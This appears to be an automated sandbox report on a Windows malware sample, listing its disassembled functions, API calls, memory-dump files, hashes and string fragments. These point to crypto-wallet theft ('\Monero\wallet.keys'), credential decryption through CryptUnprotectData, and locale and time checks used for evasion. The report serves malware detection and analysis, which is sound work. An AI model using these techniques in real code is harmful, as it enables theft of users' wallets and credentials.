                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,00D505B7), ref: 00D47D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00D47D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00D47D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D47DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00D47EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: f882e491c936a1d7822d5d931f75d882d247420bdbd4cfab9e45a9fae5d5bef8
                                      • Instruction ID: 0e3c588aae7a9771ddb239d88c03e19c17f0269be6d3c2941bde111c439fcc63
                                      • Opcode Fuzzy Hash: f882e491c936a1d7822d5d931f75d882d247420bdbd4cfab9e45a9fae5d5bef8
                                      • Instruction Fuzzy Hash: 81411A71940218ABDB24DF98DC99BEEB778FB44700F2041D9E50A66281DB746F88CFB1
                                      Function 00D3E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00D50D79), ref: 00D3E5A2
                                      • StrCmpCA.SHLWAPI(?,00D515F0), ref: 00D3E5F2
                                      • StrCmpCA.SHLWAPI(?,00D515F4), ref: 00D3E608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3ECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      • Opcode ID: 501271cecc0a2089052dd284233d1835da36b9177a6cbd2240c118437f929df8
                                      • Instruction ID: bf4eb1dd8cee638e4f637b174490925ed8ca55ab98fc7947fce44f4d5e68c139
                                      • Opcode Fuzzy Hash: 501271cecc0a2089052dd284233d1835da36b9177a6cbd2240c118437f929df8
                                      • Instruction Fuzzy Hash: 0A121D76A501189BEB14FB64DDA6AEE7339EF54300F4045E9B50A62091EF346F48CFB2
                                      Function 01186739 Relevance: 9.2, Strings: 6, Instructions: 1687COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: EQp$RBwo$YWj$jxg$u9_$n
                                      • API String ID: 0-1191438222
                                      • Opcode ID: bfe19114aee5d563e579ec6762ab5dc5d4207f6ae7c2c54ba5d81645e874ab67
                                      • Instruction ID: a6bd27328b40b7878d5a20d9d8cf952183a489d3c64363febce8a048104c188c
                                      • Opcode Fuzzy Hash: bfe19114aee5d563e579ec6762ab5dc5d4207f6ae7c2c54ba5d81645e874ab67
                                      • Instruction Fuzzy Hash: B4B229F360C204AFE308AE2DEC8567AFBD9EF94720F16853DE6C5C7744EA3558018696
                                      Function 0118B60E Relevance: 9.1, Strings: 6, Instructions: 1592COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: *@}{$+l}_$,M*($J_o$d0aW$JD
                                      • API String ID: 0-2479629521
                                      • Opcode ID: b29de0ebcc7296009acaf306a26ce7fc0b60650a5fcb71389e8b5279f970521a
                                      • Instruction ID: a78eaa94c672e1ee5e255aec7438f999a90a44deceae7f206da7f33537f4e6af
                                      • Opcode Fuzzy Hash: b29de0ebcc7296009acaf306a26ce7fc0b60650a5fcb71389e8b5279f970521a
                                      • Instruction Fuzzy Hash: 1AB208F360C2049FE304AE2DEC8567AFBE9EF94720F1A853DEAC5C3744E63558058696
                                      Function 0119051F Relevance: 9.1, Strings: 6, Instructions: 1583COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: E?~$E?~$p_{$y {>$xw|$xw|
                                      • API String ID: 0-3861228067
                                      • Opcode ID: a9b836dd127380245a01ee22c81b139f97071f000dd7441fe10956b5cbb9508b
                                      • Instruction ID: 1d6fa6819fd191e89bc76c3eca5af569799d41242ffa58fdea0ce44fadfe7347
                                      • Opcode Fuzzy Hash: a9b836dd127380245a01ee22c81b139f97071f000dd7441fe10956b5cbb9508b
                                      • Instruction Fuzzy Hash: D8B2F6F360C214AFE304AE29EC8567AFBE9EF94720F16493DEAC4C7340E67558418697
                                      Function 0118D050 Relevance: 7.9, Strings: 5, Instructions: 1651COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: !EW:$+6_$[3]}$ck_u$[i
                                      • API String ID: 0-2810132593
                                      • Opcode ID: 539974bd87a752543092940c8fba427dd457855cc22419e53a7623c78d440f6d
                                      • Instruction ID: 7e5bd1dedcb4d71cc306f3e9695382beb5d0aeb24a1dc70ce38e8d201091b51c
                                      • Opcode Fuzzy Hash: 539974bd87a752543092940c8fba427dd457855cc22419e53a7623c78d440f6d
                                      • Instruction Fuzzy Hash: 2BB21AF3A0C2049FE304AE2DEC8567AF7E9EBD4720F16893DE6C4C3744E97558058696
                                      Function 01189CBA Relevance: 7.8, Strings: 5, Instructions: 1548COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: (J@$3un$oOq|$~(x}$i{
                                      • API String ID: 0-3234530343
                                      • Opcode ID: 4528494a2db5b72f005e5c004209d02b1d603eacc69013bbe57dffcb7388cbea
                                      • Instruction ID: 5e483ca2a8357828e668efb037d5403f0b9c94579d0fe3bc2c2f80d48c8452ba
                                      • Opcode Fuzzy Hash: 4528494a2db5b72f005e5c004209d02b1d603eacc69013bbe57dffcb7388cbea
                                      • Instruction Fuzzy Hash: 72A2D6F3608204AFE3046E29EC85B7AFBE9EF94720F16493DE6C4C7744E63598058697
                                      Function 00D9F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction ID: c669c2db2fe2ca561d4a7363d865115cd8bd4c9e7262e53a7c89922d94fbd64d
                                      • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction Fuzzy Hash: 4D419112E19BC9C5CB058B7444A02AEBFB26FD6210F6D42EAC4DD5F382C774854AD3B5
                                      Function 00D3C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C97C
                                      • lstrcat.KERNEL32(?,00D50B47), ref: 00D3CA43
                                      • lstrcat.KERNEL32(?,00D50B4B), ref: 00D3CA57
                                      • lstrcat.KERNEL32(?,00D50B4E), ref: 00D3CA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: 145af8f3c2f081dddfc1636022dd35a1377da1457587e07fb887248855242538
                                      • Instruction ID: 0e5ab5caadfb23e414ba0fccf6dc59c27266526a9d28364b76e72c90bf9fd74e
                                      • Opcode Fuzzy Hash: 145af8f3c2f081dddfc1636022dd35a1377da1457587e07fb887248855242538
                                      • Instruction Fuzzy Hash: D641417590421DDFDB20CFA4DD89BFEB7B8AB48704F1041A8F549A7280D7796A84CFA1
                                      Function 00D46BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00D46C0C
                                      • sscanf.NTDLL ref: 00D46C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D46C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D46C60
                                      • ExitProcess.KERNEL32 ref: 00D46C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 1f2815c5f66ac7a42da21c4ca12c619df9fdb3f3a667e4e8ae7d2db83fe357b7
                                      • Instruction ID: fc7de8b9221dd317565f690f47397fc6c82a39d8390807c995204716bcf8f0ee
                                      • Opcode Fuzzy Hash: 1f2815c5f66ac7a42da21c4ca12c619df9fdb3f3a667e4e8ae7d2db83fe357b7
                                      • Instruction Fuzzy Hash: 5721ED75D00208ABCF15DFE4E8459EEB7B5FF48300F048529E446A3254EB35A604CB65
                                      Function 00D372A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D372AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D372B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D372E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D37304
                                      • LocalFree.KERNEL32(?), ref: 00D3730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
